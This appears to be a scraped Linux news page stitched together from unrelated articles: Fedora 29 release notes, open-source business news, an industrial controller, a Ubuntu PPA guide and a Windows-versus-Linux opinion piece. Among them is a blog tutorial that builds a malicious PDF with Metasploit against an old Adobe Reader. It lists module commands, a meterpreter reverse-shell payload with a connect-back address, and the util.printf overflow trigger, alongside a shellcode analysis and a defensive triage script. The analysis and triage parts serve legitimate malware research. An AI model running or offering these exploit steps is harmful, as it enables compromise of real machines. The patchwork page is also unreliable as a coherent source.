Linux Jobs and Processes | Linux Training Academy


Linux Scoop — Fedora 29 Workstation

Fedora 29 Workstation – See What’s New

Fedora 29 Workstation is the new release of the Fedora Linux distribution. It ships with GNOME 3.30 as the default desktop environment, is powered by the Linux kernel 4.18 series, and includes most of the latest GNOME 3.30 applications.

GNOME Software now supports automatic updates for Flatpak in Fedora 29. Flatpak is a next-generation technology for building and distributing desktop applications on Linux. It makes it easy for software makers to support multiple distributions with one format.

GNOME Boxes now supports connecting to remote Windows machines using RDP. You can attach to Windows systems from the comfort and security of your Fedora Workstation, with the same easy interface as your virtual machines.

Download Fedora 29: https://getfedora.org/workstation

Payload in PDF – ls /blog

Infected PDFs have always been a favored way to infect users, because this document format is very common and used by almost everyone. Moreover, there are many ways to exploit Acrobat Reader vulnerabilities, and it is a very stealthy and elegant way to launch malware.

In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored, and how to extract it.

This article is for research purposes only, don’t do bad things!

PDF is an object-oriented format defined by Adobe. It describes a document’s organization and preserves the dependencies the document needs (fonts, images, …). These objects are stored within the document as streams, most of the time encoded or compressed. Below is an overview of a classic PDF document. For more information, please read Adobe’s specifications.

Capture6

Infected PDF creation

We will create a fake PDF with metasploit, containing an exploit attempt, as well as a custom payload (code to execute). The exploit targets a specific version of Adobe Reader, so we will need to do some archaeology and find an ancient Reader version (thanks to http://www.oldapps.com/) to install on the target machine.

So, first, let’s make this PDF. We will make an infected PDF that just opens the calculator (calc.exe) on the machine, just for demonstration. Open a metasploit console (installation of metasploit is not covered in this article) and type:

use exploit/windows/fileformat/adobe_utilprintf

set FILENAME malicious.pdf

set PAYLOAD windows/exec

set CMD calc.exe

show options

exploit

It should look like this:

Capture7

Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) to a shared drive. You will need to feed your target machine with it.

Infected PDF execution

On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). I chose to install version 8.1.1.

Once installed, execute the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That’s the exploit.

Capture8

I’ve done another PDF but changed the payload slightly, just for fun:

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.29

set LPORT 4455

Here’s the result. Adobe Reader now has a backdoor (reverse shell) listening for commands.

Capture9

Infected PDF analysis

Played enough! Let’s see what’s inside that malicious PDF, and let’s try to extract the malicious payload (we’re still with the calc.exe PDF).

First, we will need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.

Capture10

We can start by checking if some exploit is detected by the tool using the “Exploit Scan” menu:

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6

Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture).

But let’s start at the beginning: when searching for exploits in a PDF, we most often encounter a heap spray created by JavaScript code. That heap spray is used to push the payload onto the heap, ready to be executed once the vulnerability has been triggered.

If you open Stream 1, you can see:

/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R

We can read this as: the OpenAction is in stream 5. Let’s move to stream 5:

/Type/Action/S/JavaScript/JS 6 0 R

This says to execute the JavaScript located in stream 6. That stream shows plain JavaScript, so it’s time to open the “Javascript_UI” menu. We immediately recognize a big hex-encoded string, pushed into a variable for the heap spray. This is our payload:

Capture11

Fortunately, we have tools to manipulate it and understand what it does. Select the payload (the part between quotes), and open the “Shellcode_analysis” menu. Then choose “scDbg – LibEmu Emulation”. You will get a new window with the shellcode decoded into bytes (you can even save it to a file):

Capture12

LibEmu is a library that can simulate a processor; it gives information about what the assembly code is trying to do. Just hit the “Launch” button and you will understand:

Capture13

Here it is: we can clearly see that the shellcode just opens a calc.exe window and exits.
Let’s redo the same analysis for the other malicious PDF (reverse shell):

Capture14

Uh, self-explanatory, right? The shellcode loads the library needed to manipulate sockets (ws2_32.dll) and tries to connect back to the C&C.

I haven’t talked about the exploit itself yet. It’s located at the end of the JavaScript code (as stated by the Exploit Scan, “util.printf – found in stream: 6”). It exploits a buffer overflow in the printf function to execute arbitrary code (here, our heap-sprayed shellcode).

util.printf("%45000.45000f", 0);
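
The object walk described above (catalog, /OpenAction, JavaScript action, script stream) can be automated for triage of incoming documents. The following Python is an added example, not part of the original post or of PDF Stream Dumper; it assumes indirect references as seen in streams 1 and 5, a script stream that is uncompressed or FlateDecode, and detection thresholds chosen here for illustration. The sample document is constructed and carries only filler bytes.

```python
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
PRINTF_RE = re.compile(rb"util\.printf\s*\(\s*[\"']%(\d+)\.(\d+)f")
SPRAY_RE = re.compile(rb"(?:%u[0-9a-fA-F]{4}){32,}")  # length threshold: assumption
MAX_SANE_FIELD = 1000  # assumption: legitimate width/precision stays far below this

def parse_objects(pdf: bytes) -> dict:
    """Map object number -> raw body (dictionary plus optional stream)."""
    return {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(pdf)}

def ref(body: bytes, key: bytes):
    """Object number of an indirect reference such as '/JS 6 0 R', else None."""
    m = re.search(rb"/" + key + rb"\s*(\d+)\s+\d+\s+R", body)
    return int(m.group(1)) if m else None

def stream_data(body: bytes) -> bytes:
    """Extract a stream, inflating it when /FlateDecode is declared."""
    m = re.search(rb"stream\r?\n(.*?)\r?\nendstream", body, re.S)
    if not m:
        return b""
    data = m.group(1)
    if b"/FlateDecode" in body:
        try:
            data = zlib.decompressobj().decompress(data)
        except zlib.error:
            pass  # leave raw; other filters need their own decoder
    return data

def triage(pdf: bytes) -> dict:
    """Follow Catalog -> /OpenAction -> /JS and scan the script for indicators."""
    result = {"js_object": None, "findings": []}
    objs = parse_objects(pdf)
    catalog = next((b for b in objs.values() if re.search(rb"/Type\s*/Catalog", b)), b"")
    action = objs.get(ref(catalog, b"OpenAction"), b"")
    if not re.search(rb"/S\s*/JavaScript", action):
        return result
    js_no = ref(action, b"JS")
    if js_no is not None:
        js = stream_data(objs.get(js_no, b""))
    else:  # script stored as a literal string inside the action itself
        m = re.search(rb"/JS\s*\((.*)\)", action, re.S)
        js = m.group(1) if m else b""
    result["js_object"] = js_no
    result["findings"].append("JavaScript runs automatically via /OpenAction")
    m = PRINTF_RE.search(js)
    if m and max(int(m.group(1)), int(m.group(2))) >= MAX_SANE_FIELD:
        result["findings"].append("util.printf oversized field (CVE-2008-2992 pattern)")
    if SPRAY_RE.search(js):
        result["findings"].append("long %u-escaped string (encoded payload)")
    return result

def build_sample() -> bytes:
    """Constructed sample: object layout from the article, filler bytes only."""
    js = (b'var s = unescape("' + b"%u4141" * 64 + b'");\n'
          b'util.printf("%45000.45000f", 0);')
    z = zlib.compress(js)
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R>>endobj\n",
        b"5 0 obj<</Type/Action/S/JavaScript/JS 6 0 R>>endobj\n",
        b"6 0 obj<</Length %d/Filter/FlateDecode>>stream\n" % len(z),
        z, b"\nendstream endobj\n",
    ])

if __name__ == "__main__":
    print(triage(build_sample()))
```

A document with no /OpenAction JavaScript returns an empty findings list, and an ordinary call such as `util.printf("%5.2f", 1)` is reported only as auto-running script, not as the overflow pattern.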

I hope you enjoyed this blog post, please like, comment or share, or do all of that, it’s up to you. Also, thanks for the visit 😉

Author: tigzy

Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.


FDA releases open source code, open source software gets emotional, and more news

In this edition of our open source news roundup, we take a look at two open source companies getting funding, the FDA open sources app code, Barcelona upping its open source investment, and more.

Open source firms finish funding rounds

In the last two weeks, IBM’s acquisition of Red Hat led the open source business headlines. But two other companies that develop open source software also made some bold financial moves that filled their coffers quite nicely.

Hashicorp announced it has raised $100 million from two venture capital firms. The maker of tools for managing cloud applications plans to use that funding “to boost its open-source and commercial product development roadmaps, accelerate hiring and step up customer-facing activities such as training.” That funding also helped push the company’s valuation to $1.9 billion (USD).

Neo4j, which develops open source graph databases, didn’t do too badly, either. The company pulled in $80 million (USD) in investments, which doubles the amount of funding it’s managed to attract. According to Neo4j’s CEO Emil Eifrem, the company will use that money to “grow its developer tools and support popular use cases.” Eifrem adds that the infusion of cash also provides “Neo4j with the resources to serve our new and existing customers with the best graph platform to harness connected data for AI.”

FDA releases open source code

The Food and Drug Administration (FDA) in the United States has open sourced the code for its MyStudies app. The app, which is available for Android and iOS, enables medical researchers to collect patient data for use in clinical trials and studies.

The source code and documentation for MyStudies are available on GitHub, and the FDA hopes that “developers or hospital and academic medical center researchers can customize and rebrand MyStudies for their own purposes.”

Barcelona increases its investment in open source

The city of Barcelona has reached an important milestone. This year, almost 80% of the city’s IT budget is devoted to open source. On top of that, Barcelona has made eight of its projects available on GitHub, with seven more to follow.

Xavier Roca, Barcelona’s director of IT development, says the city intends to link almost all of its IT spending to open source by 2020. Until then, Roca says, Barcelona will “continue to work with proprietary software solutions, as we have systems in place that require maintenance.”

Analyzing emotions with open source software

Machines are getting closer to better recognizing human emotions, thanks to open source software developed by a team of European researchers. Called the MixedEmotions Toolkit, the software can learn to recognize “emotions through text, audio and video processing.”

Mixed Emotions is made up of several modules that analyze text and multimedia and relationships in social networks, and does machine translation between several European languages. The researchers also developed a Python package called Senpy, “for developing and publishing emotion analysis services and tools, mainly focused on text processing.”

The source code for the toolkit is available on GitHub.


Modular automation controller builds on UP Squared SBC

Techbase is shipping a Linux-friendly industrial automation controller called the ModBerry M2000 based on the UP Squared SBC, featuring GbE, SATA, and M.2.

Polish development firm Techbase offers a growing family of industrial control computers based on popular SBCs such as the Raspberry Pi 3B+ based ModBerry M500 and UP board based ModBerry M1000. Now, it has added an M2000 model built on Aaeon’s UP Squared SBC. While the M1000’s UP board uses a 1.44GHz Intel Cherry Trail Atom processor, the M2000’s UP Squared advances to an Intel Apollo Lake chip.

The ModBerry M2000 offers a choice of a dual-core, up to 2.4GHz Celeron N3350 or a quad-core, up to 2.5GHz Pentium N4200. Linux, Android, and Windows are available.

ModBerry M2000 (left) and UP Squared

The ModBerry M2000 provides twice the maximum RAM and eMMC storage as the M1000, with a choice of 2GB, 4GB, or 8GB RAM and 16GB to 128GB eMMC. Unlike the M1000, you get SATA 3.0 and M.2 slots for additional storage, as well as dual standard GbE ports.

Other features on this highly modular system are almost identical to the M1000, including up to 26x DIO, 24x analog inputs, 36x analog outputs, and 12x relay outputs. The system is further equipped with HDMI and USB 3.0 ports, a 1-wire interface, and up to 12x serial ports. Options include a 1-inch OLED display, a Supercap UPS, battery support, a CAN port, an IP67 enclosure, and a wide temperature range.

M2000 feature comparison with other ModBerry systems (left) and wireless, ExCard, and mBus add-on options

As with other ModBerry systems, you can add up to three wireless modules and/or ExCard and mBus I/O modules via side-mounted add-on compartments (see charts above). Wireless features include different types of WiFi, Bluetooth, ZigBee, WMBus, and LoRa. You can also choose from among 2G, 3G, LTE Cat 3, and NB-IoT cellular options, each accompanied by optional or standard GPS. ExCards include additional serial, Ethernet, analog, digital, and relay I/O, among other options.

Like its siblings, the ModBerry M2000 ships with iMod software to support protocols such as MQTT, MODBUS, SNMP, and MBus. iMod offers an easier alternative to the underlying PLC software, which is still accessible. Optional software includes PLC Codesys, a notification controller, and an application for C-L-V (Convert-Log-Visualize) usage.

Further information

The ModBerry M2000 is available now. Off-the-shelf pricing is not listed, since the ModBerry systems are modularly customizable and “the sales department prices every configuration separately” based on the customer’s specific requirements. More information may be found in Techbase’s ModBerry M2000 announcement, as well as its ModBerry M-series product/configuration page and ModBerry home page.


The Latest Version of the Nest Simulator Now Available in Fedora, Cloudflare’s 1.1.1.1 DNS Services Comes to Android, Ceph Now Has Its Own Open-Source Foundation, Valve Making a VR Headset and Sparky Linux 4.9 Released

News briefs for November 12, 2018.

The Fedora team announces that the latest version of the Nest simulator is now available in Fedora as part of the NeuroFedora initiative. Nest allows computational neuroscientists to “make large scale computer models of the brain that are needed to investigate among other things, how the brain processes information”. Nest provides an easy to use Python interface and it can be run on both laptops and supercomputing clusters.

Cloudflare’s 1.1.1.1 DNS service comes to Android and iOS. According to The Verge, “The mobile app uses features like VPN support to push your mobile traffic towards the 1.1.1.1 DNS servers and improve speeds. It will also prevent your carrier from tracking your browsing history and potentially selling it. Cloudflare is promising not to track 1.1.1.1 users or sell ads, and the company has retained KPMG to perform an annual audit and publish a public report.” You can download it for Android here.

The Ceph storage project receives a dedicated open-source foundation, hosted by The Linux Foundation. TechCrunch quotes Sage Weil, Ceph’s co-creator, project leader, and chief architect at Red Hat for Ceph: “Today’s launch of the Ceph Foundation is a testament to the strength of a diverse open source community coming together to address the explosive growth in data storage and services.”

Valve appears to be making its own VR headset. GamingOnLinux reports that a leaked imgur album shows several photos of the new hardware with a Valve logo. Valve also is apparently working on a new Half-Life title for VR.

Sparky Linux 4.9 has been released, which celebrates 100 years of Poland’s independence. Sparky 4.9 offers the LXDE desktop environment and minimal images of MinimalGUI (Openbox) and MinimalCLI (text mode), so you can “install the base system with a desktop of your choice with a minimal set of applications, via the Sparky Advanced Installer”. In addition to added packages and updates, this new version has the code name “100”, commemorating the 100th anniversary of Poland’s independence, and it provides information about Polish history and also includes new Poland nature wallpapers.


A Free Guide for Setting Your Open Source Strategy

Learn how to align your goals for managing and creating open source software with your organization’s business objectives using the tips and proven practices from the TODO Group.

The majority of companies using open source understand its business value, but they may lack the tools to strategically implement an open source program and reap the full rewards. According to a recent survey from The New Stack, “the top three benefits of open source programs are 1) increased awareness of open source, 2) more speed and agility in the development cycle, and 3) better license compliance.”

Running an open source program office involves creating a strategy to help you define and implement your approach as well as measure your progress. The Open Source Guides to the Enterprise, developed by The Linux Foundation in partnership with the TODO Group, offer open source expertise based on years of experience and practice.

The most recent guide, Setting an Open Source Strategy, details the essential steps in creating a strategy and setting you on the path to success. According to the guide, “your open source strategy connects the plans for managing, participating in, and creating open source software with the business objectives that the plans serve. This can open up many opportunities and catalyze innovation.” The guide covers the following topics:

  1. Why create a strategy?
  2. Your strategy document
  3. Approaches to strategy
  4. Key considerations
  5. Other components
  6. Determine ROI
  7. Where to invest

The critical first step here is creating and documenting your open source strategy, which will “help you maximize the benefits your organization gets from open source.” At the same time, your detailed strategy can help you avoid difficulties that may arise from mistakes such as choosing the wrong license or improperly maintaining code. According to the guide, this document can also:

  • Get leaders excited and involved
  • Help obtain buy-in within the company
  • Facilitate decision-making in diffuse, multi-departmental organizations
  • Help build a healthy community
  • Explain your company’s approach to open source and support of its use
  • Clarify where your company invests in community-driven, external R&D and where your company will focus on its value added differentiation

“At Salesforce, we have internal documents that we circulate to our engineering team, providing strategic guidance and encouragement around open source. These encourage the creation and use of open source, letting them know in no uncertain terms that the strategic leaders at the company are fully behind it. Additionally, if there are certain kinds of licenses we don’t want engineers using, or other open source guidelines for them, our internal documents need to be explicit,” said Ian Varley, Software Architect at Salesforce and contributor to the guide.

Open source programs help promote an enterprise culture that can make companies more productive, and, according to the guide, a strong strategy document can “help your team understand the business objectives behind your open source program, ensure better decision-making, and minimize risks.”

Learn how to align your goals for managing and creating open source software with your organization’s business objectives using the tips and proven practices in the new guide to Setting an Open Source Strategy. And, check out all 12 Open Source Guides for the Enterprise for more information on achieving success with open source.


How to Add and Remove PPA on Ubuntu

If you’re using Ubuntu, you’re already familiar with the software repository. It’s a HUGE collection of all the necessary tools Ubuntu needs to run. The repository is always kept up-to-date with the latest versions of the software. However, not all software is present in the repository. There are a number of essential tools that you need to get from other sources. Even after grabbing those apps, you have to make sure that they stay up-to-date. To solve this issue, Ubuntu features a great method – PPA.

A PPA (Personal Package Archive) is a special software repository that allows APT (Advanced Packaging Tool) to automatically grab specific software from that repository. A PPA offers an easier method of getting the latest software without any delay. All you have to do is tell “apt” to upgrade your system. Most of the world’s PPAs are hosted on Launchpad. However, there are a number of private PPAs hosted on different sites.

How to add a PPA

First, find out which PPA you need to add. The easiest way to add a PPA is from the terminal. The command uses the following structure –

sudo add-apt-repository ppa:abc/xyz

Let’s have a quick breakdown of each part of the command.

  • sudo – Running the command with “root” privilege.
  • add-apt-repository – The tool for adding the PPA.
  • ppa:abc/xyz – The repository code.

For this example, we’ll be using the uGet official PPA.

Run the following command –

sudo add-apt-repository ppa:plushuang-tw/uget-stable

Installing the software

Now, your system is ready to get your target software. However, make sure that your “apt” repository database is up-to-date with the latest addition of the above PPA.

Install uGet –

Voila! uGet is installed!

Removing the PPA

If you don’t need a PPA anymore, it’s best to remove it from your system.

  • Method 1

The best way of removing a PPA is through the command.

Run the following command –

sudo add-apt-repository --remove ppa:plushuang-tw/uget-stable

Don’t forget to update your “apt” database cache –

  • Method 2

You can also remove the PPA using the GUI method.

From the menu, search for “software”.

Open Software & Updates.

Open the “Other Software” tab.

Here, you’ll find all the PPAs you have added to your system over its lifetime.

Select the unwanted PPA(s) and hit “Remove”.

When closing, make sure that you reload the software repository database of “apt”.

Voila! PPA is removed!
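
On a machine without the GUI, the same inventory that the “Other Software” tab shows can be read from APT's source files, which is useful when reviewing which third-party archives a host trusts. The following Python is an added example, not part of the original article; it assumes the standard locations /etc/apt/sources.list and /etc/apt/sources.list.d/, the Launchpad hostnames ppa.launchpad.net and ppa.launchpadcontent.net, and uses constructed sample entries (the suite names and the second PPA are placeholders).

```python
import re
from pathlib import Path

# Launchpad serves PPAs from either hostname; the path is /<owner>/<ppa>/ubuntu
PPA_URL = re.compile(r"https?://ppa\.launchpad(?:content)?\.net/([^/\s]+)/([^/\s]+)/")

# Constructed samples: classic one-line format and deb822 (.sources) format.
LIST_SAMPLE = """\
deb http://ppa.launchpad.net/plushuang-tw/uget-stable/ubuntu bionic main
# deb-src http://ppa.launchpad.net/plushuang-tw/uget-stable/ubuntu bionic main
"""
DEB822_SAMPLE = """\
Types: deb
URIs: https://ppa.launchpadcontent.net/example-owner/example-ppa/ubuntu/
Suites: noble
Components: main
Enabled: no
"""


def ppas_in(text: str) -> list:
    """Return 'ppa:owner/name' for every enabled PPA entry in one APT source file."""
    found = []
    for stanza in re.split(r"\n\s*\n", text):
        lines = [l.strip() for l in stanza.splitlines()
                 if l.strip() and not l.lstrip().startswith("#")]
        # deb822 stanzas consist of "Field: value" lines (field names are case-insensitive)
        pairs = (l.split(":", 1) for l in lines if re.match(r"[A-Za-z-]+:", l))
        fields = {k.strip().lower(): v.strip() for k, v in pairs}
        if "uris" in fields:
            if fields.get("enabled", "yes").lower() == "no":
                continue  # disabled stanza: APT ignores it
            candidates = [fields["uris"]]
        else:  # classic one-line format; commented-out lines were dropped above
            candidates = [l for l in lines if l.startswith("deb ")]
        for entry in candidates:
            for m in PPA_URL.finditer(entry):
                found.append(f"ppa:{m.group(1)}/{m.group(2)}")
    return found


def installed_ppas(apt_dir: str = "/etc/apt") -> dict:
    """Map each APT source file name to the enabled PPAs it configures."""
    base = Path(apt_dir)
    files = [base / "sources.list"]
    if (base / "sources.list.d").is_dir():
        files += sorted(p for p in (base / "sources.list.d").iterdir()
                        if p.suffix in (".list", ".sources"))
    report = {}
    for f in files:
        if f.is_file():
            ppas = ppas_in(f.read_text(errors="replace"))
            if ppas:
                report[f.name] = ppas
    return report


if __name__ == "__main__":
    for name, ppas in installed_ppas().items():
        print(name, ", ".join(ppas))
```

Each reported `ppa:owner/name` is in the form that `add-apt-repository --remove` accepts.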

Enjoy!


Paging Linux Users: What Made You Give Up on Windows?

Once described by Microsoft as “a cancer,” the Linux world has become a key focus for Microsoft these days, especially as part of the company’s transformation started shortly after Satya Nadella took over the CEO role from Steve Ballmer.

With Nadella at the helm of the company, the software giant has made it very clear that “Microsoft loves Linux,” and this message has been reiterated on pretty much every single occasion.

At some level, this makes perfect sense, as Microsoft has become more interested in developers, and in their turn, developers are often deeply committed to the Linux ecosystem.

But for a company that stood so firmly against Linux, this is quite a change of mind. And not only does Microsoft like Linux, but even Steve Ballmer, the former company leader who used the cancer phrase, thinks the open-source world is worth the love.

These days, instead of fighting against Linux, Microsoft wants to make this platform its own ally in a struggle to transform Windows 10 into the operating system for virtually everything and everyone.

Linux now runs on top of Windows 10 thanks to a feature called Windows Subsystem for Linux, and several super-popular distributions are available in the Microsoft Store, including Ubuntu. Microsoft joined forces with quite a lot of Linux companies, and a substantial share of Linux developers are now using Windows 10 thanks to the improvements mentioned above.

However, Windows 10 is far from becoming the operating system for everyone, as Microsoft itself hopes. And the most recent blunders that the software giant produced on its own show once again that an alternative to Windows 10 does exist, and that alternative is Linux.

Sure, many people think switching to Apple is the right way to go given the somewhat more user-friendly approach, but the overall cost of this transition is what pushes more people to Linux. Apple continues to build devices that are way too expensive for a significant share of computer users, so it’s either Windows or Linux for many out there.

Ubuntu is now available for Windows 10 users from the Microsoft Store


One of those blunders that made some users look beyond Windows is the October 2018 Update fiasco. Launched on October 2 with much fanfare, Windows 10 October 2018 Update, also referred to as version 1809, was pulled only a few days later after Microsoft discovered a critical bug which might have caused the removal of user files stored in libraries.

The next few weeks were all about further bugs discovered in Windows 10 version 1809, and this update eventually turned out to be one of the buggiest releases in a long time.

As a result, I’ve seen quite a lot of people praising the world of Linux, and some of our readers told me this is something you don’t see happening on distributions like Ubuntu or Linux Mint. Of course, there’s no flawless operating system out there, but for many users, the Windows 10 version 1809 fiasco was just too much to continue using Microsoft products.

Statistics, however, don’t seem to indicate that an en-masse migration to Linux is happening right now, though there’s a chance that more users will explore such a switch in the coming months. Linux isn’t exactly the right operating system for everyone, as is the case for gamers, for instance, but on the other hand, it serves quite a wide array of purposes with advanced functionality you don’t find on Windows.

Getting in touch with users is always the best way to receive feedback on a certain product, service, or trend, and because Microsoft has such a hard time getting Windows right, you are definitely the ones that should help guide the company towards its final goal of making Windows the best OS for everyone.

Why did you give up on Windows and switch to Linux? What does Microsoft need to do to win you back? Is there any Linux feature you’d want to see on Windows?

Let us and Microsoft know what you think in the box below.
